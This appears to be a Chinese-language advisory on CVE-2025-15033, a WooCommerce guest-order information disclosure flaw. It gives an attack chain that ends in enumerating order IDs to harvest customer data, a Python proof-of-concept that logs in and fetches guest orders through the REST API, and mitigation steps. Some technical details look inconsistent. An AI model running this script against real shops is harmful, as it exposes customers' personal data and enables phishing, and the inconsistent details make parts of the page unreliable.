CVE-2025-15033 WooCommerce访客订单信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-15033

漏洞类型

访问控制/信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WooCommerce

漏洞概述

CVE-2025-15033是WordPress电商插件WooCommerce中的一个授权后信息泄露漏洞。该漏洞影响WooCommerce 8.1至10.4.2版本，允许已登录的合法用户访问其他访客客户的订单数据。在具有特定配置的网站上，攻击者可以利用此漏洞绕过正常的访问控制机制，获取敏感的客户信息，包括订单详情、联系方式、收货地址等。漏洞的CVSS评分为6.5，属于中等严重程度，主要风险在于机密性影响较高（机密性影响评级为H）。由于该漏洞需要攻击者具有低权限的登录账号，因此主要威胁来自内部用户或被攻陷的低权限账户。漏洞已于WooCommerce 10.4.3和8.1.3版本中修复。

技术细节

该漏洞属于垂直越权访问控制缺陷。在WooCommerce的订单查询逻辑中，系统未能正确验证当前登录用户是否有权访问特定订单。当订单查询参数中指定的订单属于访客用户时，系统错误地返回了订单数据而非拒绝访问。漏洞利用条件包括：1）目标网站使用WooCommerce 8.1-10.4.2版本；2）网站允许访客下单；3）攻击者拥有该网站的低权限账户。攻击者通过构造特定的API请求，将目标订单ID作为参数发送，系统在未充分验证订单所有者身份的情况下返回了完整的订单信息。攻击者可以通过遍历订单ID来批量获取访客订单数据。CVSS向量显示攻击复杂度低（AC:L），无需用户交互（UI:N），但需要低权限认证（PR:L）。

攻击链分析

STEP 1

1

攻击者获取目标WordPress网站的低权限账户（如客户账号）

STEP 2

2

攻击者构造针对WooCommerce订单API的HTTP请求，目标指向访客订单ID

STEP 3

3

服务器接收请求后，未正确验证当前用户与目标订单的关联性

STEP 4

4

系统错误地返回访客订单的完整数据，包括客户个人信息、联系方式、收货地址等

STEP 5

5

攻击者通过遍历订单ID批量获取多个访客订单的敏感信息

STEP 6

6

攻击者利用泄露的客户数据进行二次攻击，如社会工程、钓鱼攻击或身份冒充

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-15033 WooCommerce Guest Order Information Disclosure PoC # Requires authenticated user with low privileges import requests import sys TARGET_URL = "https://vulnerable-site.com" USERNAME = "[email protected]" PASSWORD = "password123" TARGET_ORDER_ID = 12345 # Guest order ID to target def exploit_cve_2025_15033(): """ Exploit for WooCommerce CVE-2025-15033 Information disclosure via unauthorized guest order access """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{TARGET_URL}/wp-login.php" login_data = { "log": USERNAME, "pwd": PASSWORD, "wp-submit": "Log In" } response = session.post(login_url, data=login_data) if "wordpress_logged_in" not in session.cookies: print("[-] Authentication failed") return None print("[+] Successfully authenticated") # Step 2: Attempt to access guest order data # WooCommerce REST API endpoint for orders order_url = f"{TARGET_URL}/wp-json/wc/v3/orders/{TARGET_ORDER_ID}" headers = { "Content-Type": "application/json" } response = session.get(order_url, headers=headers) if response.status_code == 200: order_data = response.json() print(f"[+] Successfully accessed guest order {TARGET_ORDER_ID}") print(f"[+] Order data leaked: {order_data}") return order_data else: print(f"[-] Failed to access order: {response.status_code}") return None if __name__ == "__main__": exploit_cve_2025_15033()

影响范围

WooCommerce 8.1 - 8.1.2

WooCommerce 8.2 - 8.x

WooCommerce 9.x

WooCommerce 10.0 - 10.4.2

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1）禁用WooCommerce REST API的订单查询功能；2）添加自定义代码验证用户与订单的所有权关系；3）限制访客下单功能；4）增加订单访问的速率限制防止批量扫描；5）监控日志中的异常订单访问模式。同时建议审查现有用户账户，删除不必要的低权限账户，并通知可能受影响的客户注意防范钓鱼攻击。